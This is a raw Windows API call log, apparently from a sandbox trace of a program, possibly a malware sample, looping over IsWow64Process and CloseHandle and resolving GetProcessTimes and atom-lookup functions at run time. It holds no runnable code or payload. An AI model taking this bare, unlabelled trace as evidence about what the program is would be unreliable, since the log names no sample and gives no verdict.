	[0134.600] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.600] CloseHandle (hObject=0x2dc) returned 1
	[0134.601] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.601] CloseHandle (hObject=0x2dc) returned 1
	[0134.601] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.601] CloseHandle (hObject=0x2dc) returned 1
	[0134.601] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.601] CloseHandle (hObject=0x2dc) returned 1
	[0134.601] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.601] CloseHandle (hObject=0x2dc) returned 1
	[0134.602] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.602] CloseHandle (hObject=0x2dc) returned 1
	[0134.602] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.602] CloseHandle (hObject=0x2dc) returned 1
	[0134.602] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.602] CloseHandle (hObject=0x2dc) returned 1
	[0134.602] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.602] CloseHandle (hObject=0x2dc) returned 1
	[0134.603] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.603] CloseHandle (hObject=0x2dc) returned 1
	[0134.603] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.603] CloseHandle (hObject=0x2dc) returned 1
	[0134.603] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.603] CloseHandle (hObject=0x2dc) returned 1
	[0134.603] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.603] CloseHandle (hObject=0x2dc) returned 1
	[0134.603] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.604] CloseHandle (hObject=0x2dc) returned 1
	[0134.604] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.604] CloseHandle (hObject=0x2dc) returned 1
	[0134.604] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.604] CloseHandle (hObject=0x2dc) returned 1
	[0134.604] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.604] CloseHandle (hObject=0x2dc) returned 1
	[0134.604] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.604] CloseHandle (hObject=0x2dc) returned 1
	[0134.605] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.605] CloseHandle (hObject=0x2dc) returned 1
	[0134.605] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.605] CloseHandle (hObject=0x2dc) returned 1
	[0134.605] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.605] CloseHandle (hObject=0x2dc) returned 1
	[0134.605] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.605] CloseHandle (hObject=0x2dc) returned 1
	[0134.606] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.606] CloseHandle (hObject=0x2dc) returned 1
	[0134.606] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.606] CloseHandle (hObject=0x2dc) returned 1
	[0134.606] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.606] CloseHandle (hObject=0x2dc) returned 1
	[0134.606] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.606] CloseHandle (hObject=0x2dc) returned 1
	[0134.607] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.607] CloseHandle (hObject=0x2dc) returned 1
	[0134.607] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.607] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0134.607] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0134.608] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.608] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0134.608] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.608] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0134.608] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0134.608] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0134.609] CloseHandle (hObject=0x2dc) returned 1
	[0134.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0134.609] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.609] CloseHandle (hObject=0x2dc) returned 1
	[0134.609] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.609] CloseHandle (hObject=0x2dc) returned 1
	[0134.609] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.609] CloseHandle (hObject=0x2dc) returned 1
	[0134.610] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.610] CloseHandle (hObject=0x2dc) returned 1
	[0134.610] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.610] CloseHandle (hObject=0x2dc) returned 1
	[0134.643] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.643] CloseHandle (hObject=0x2dc) returned 1
	[0134.643] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.643] CloseHandle (hObject=0x2dc) returned 1
	[0134.643] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.644] CloseHandle (hObject=0x2dc) returned 1
	[0134.644] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.644] CloseHandle (hObject=0x2dc) returned 1
	[0134.644] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.644] CloseHandle (hObject=0x2dc) returned 1
	[0134.644] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.644] CloseHandle (hObject=0x2dc) returned 1
	[0134.644] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.644] CloseHandle (hObject=0x2dc) returned 1
	[0134.645] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.645] CloseHandle (hObject=0x2dc) returned 1
	[0134.645] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.645] CloseHandle (hObject=0x2dc) returned 1
	[0134.645] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.645] CloseHandle (hObject=0x2dc) returned 1
	[0134.645] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.645] CloseHandle (hObject=0x2dc) returned 1
	[0134.646] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.646] CloseHandle (hObject=0x2dc) returned 1
	[0134.646] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.646] CloseHandle (hObject=0x2dc) returned 1
	[0134.646] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.646] CloseHandle (hObject=0x2dc) returned 1
	[0134.646] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.646] CloseHandle (hObject=0x2dc) returned 1
	[0134.647] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.647] CloseHandle (hObject=0x2dc) returned 1
	[0134.647] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.647] CloseHandle (hObject=0x2dc) returned 1
	[0134.647] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.647] CloseHandle (hObject=0x2dc) returned 1
	[0134.647] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.647] CloseHandle (hObject=0x2dc) returned 1
	[0134.648] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.648] CloseHandle (hObject=0x2dc) returned 1
	[0134.648] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.648] CloseHandle (hObject=0x2dc) returned 1
	[0134.648] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.648] CloseHandle (hObject=0x2dc) returned 1
	[0134.648] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.648] CloseHandle (hObject=0x2dc) returned 1
	[0134.649] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.649] CloseHandle (hObject=0x2dc) returned 1
	[0134.649] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.649] CloseHandle (hObject=0x2dc) returned 1
	[0134.649] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.649] CloseHandle (hObject=0x2dc) returned 1
	[0134.649] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.649] CloseHandle (hObject=0x2dc) returned 1
	[0134.649] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.650] CloseHandle (hObject=0x2dc) returned 1
	[0134.650] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.650] CloseHandle (hObject=0x2dc) returned 1
	[0134.650] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.650] CloseHandle (hObject=0x2dc) returned 1
	[0134.651] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.651] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0134.651] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0134.651] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.651] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0134.652] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.652] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0134.652] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0134.652] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0134.652] CloseHandle (hObject=0x2dc) returned 1
	[0134.652] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0134.652] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.652] CloseHandle (hObject=0x2dc) returned 1
	[0134.652] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.653] CloseHandle (hObject=0x2dc) returned 1
	[0134.653] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.653] CloseHandle (hObject=0x2dc) returned 1
	[0134.653] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.653] CloseHandle (hObject=0x2dc) returned 1
	[0134.653] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.653] CloseHandle (hObject=0x2dc) returned 1
	[0134.686] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.686] CloseHandle (hObject=0x2dc) returned 1
	[0134.686] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.686] CloseHandle (hObject=0x2dc) returned 1
	[0134.686] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.687] CloseHandle (hObject=0x2dc) returned 1
	[0134.687] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.687] CloseHandle (hObject=0x2dc) returned 1
	[0134.687] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.687] CloseHandle (hObject=0x2dc) returned 1
	[0134.687] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.687] CloseHandle (hObject=0x2dc) returned 1
	[0134.687] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.687] CloseHandle (hObject=0x2dc) returned 1
	[0134.688] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.688] CloseHandle (hObject=0x2dc) returned 1
	[0134.688] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.688] CloseHandle (hObject=0x2dc) returned 1
	[0134.688] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.688] CloseHandle (hObject=0x2dc) returned 1
	[0134.688] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.689] CloseHandle (hObject=0x2dc) returned 1
	[0134.689] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.689] CloseHandle (hObject=0x2dc) returned 1
	[0134.689] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.689] CloseHandle (hObject=0x2dc) returned 1
	[0134.689] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.689] CloseHandle (hObject=0x2dc) returned 1
	[0134.689] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.690] CloseHandle (hObject=0x2dc) returned 1
	[0134.690] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.690] CloseHandle (hObject=0x2dc) returned 1
	[0134.690] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.690] CloseHandle (hObject=0x2dc) returned 1
	[0134.690] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.690] CloseHandle (hObject=0x2dc) returned 1
	[0134.690] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.690] CloseHandle (hObject=0x2dc) returned 1
	[0134.691] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.691] CloseHandle (hObject=0x2dc) returned 1
	[0134.691] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.691] CloseHandle (hObject=0x2dc) returned 1
	[0134.691] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.691] CloseHandle (hObject=0x2dc) returned 1
	[0134.691] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.691] CloseHandle (hObject=0x2dc) returned 1
	[0134.692] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.692] CloseHandle (hObject=0x2dc) returned 1
	[0134.692] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.692] CloseHandle (hObject=0x2dc) returned 1
	[0134.692] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.692] CloseHandle (hObject=0x2dc) returned 1
	[0134.692] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.692] CloseHandle (hObject=0x2dc) returned 1
	[0134.692] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.693] CloseHandle (hObject=0x2dc) returned 1
	[0134.693] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.693] CloseHandle (hObject=0x2dc) returned 1
	[0134.693] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.693] CloseHandle (hObject=0x2dc) returned 1
	[0134.693] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.694] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0134.694] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0134.694] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.694] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0134.694] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.694] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0134.694] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0134.695] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0134.695] CloseHandle (hObject=0x2dc) returned 1
	[0134.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0134.695] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.695] CloseHandle (hObject=0x2dc) returned 1
	[0134.695] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.695] CloseHandle (hObject=0x2dc) returned 1
	[0134.695] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.695] CloseHandle (hObject=0x2dc) returned 1
	[0134.696] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.696] CloseHandle (hObject=0x2dc) returned 1
	[0134.696] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.696] CloseHandle (hObject=0x2dc) returned 1
	[0134.729] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.729] CloseHandle (hObject=0x2dc) returned 1
	[0134.730] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.730] CloseHandle (hObject=0x2dc) returned 1
	[0134.730] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.730] CloseHandle (hObject=0x2dc) returned 1
	[0134.730] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.730] CloseHandle (hObject=0x2dc) returned 1
	[0134.730] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.730] CloseHandle (hObject=0x2dc) returned 1
	[0134.731] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.731] CloseHandle (hObject=0x2dc) returned 1
	[0134.731] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.731] CloseHandle (hObject=0x2dc) returned 1
	[0134.731] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.731] CloseHandle (hObject=0x2dc) returned 1
	[0134.731] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.731] CloseHandle (hObject=0x2dc) returned 1
	[0134.732] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.732] CloseHandle (hObject=0x2dc) returned 1
	[0134.732] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.732] CloseHandle (hObject=0x2dc) returned 1
	[0134.732] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.732] CloseHandle (hObject=0x2dc) returned 1
	[0134.732] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.732] CloseHandle (hObject=0x2dc) returned 1
	[0134.733] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.733] CloseHandle (hObject=0x2dc) returned 1
	[0134.733] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.733] CloseHandle (hObject=0x2dc) returned 1
	[0134.733] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.733] CloseHandle (hObject=0x2dc) returned 1
	[0134.733] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.733] CloseHandle (hObject=0x2dc) returned 1
	[0134.734] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.734] CloseHandle (hObject=0x2dc) returned 1
	[0134.734] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.734] CloseHandle (hObject=0x2dc) returned 1
	[0134.734] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.734] CloseHandle (hObject=0x2dc) returned 1
	[0134.734] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.734] CloseHandle (hObject=0x2dc) returned 1
	[0134.735] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.735] CloseHandle (hObject=0x2dc) returned 1
	[0134.735] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.735] CloseHandle (hObject=0x2dc) returned 1
	[0134.735] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.735] CloseHandle (hObject=0x2dc) returned 1
	[0134.735] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.735] CloseHandle (hObject=0x2dc) returned 1
	[0134.735] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.736] CloseHandle (hObject=0x2dc) returned 1
	[0134.736] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.736] CloseHandle (hObject=0x2dc) returned 1
	[0134.736] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.736] CloseHandle (hObject=0x2dc) returned 1
	[0134.736] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.736] CloseHandle (hObject=0x2dc) returned 1
	[0134.736] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.737] CloseHandle (hObject=0x2dc) returned 1
	[0134.737] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.737] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0134.737] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0134.737] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.738] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0134.738] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.738] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0134.738] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0134.738] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0134.738] CloseHandle (hObject=0x2dc) returned 1
	[0134.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0134.738] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.739] CloseHandle (hObject=0x2dc) returned 1
	[0134.739] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.739] CloseHandle (hObject=0x2dc) returned 1
	[0134.739] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.739] CloseHandle (hObject=0x2dc) returned 1
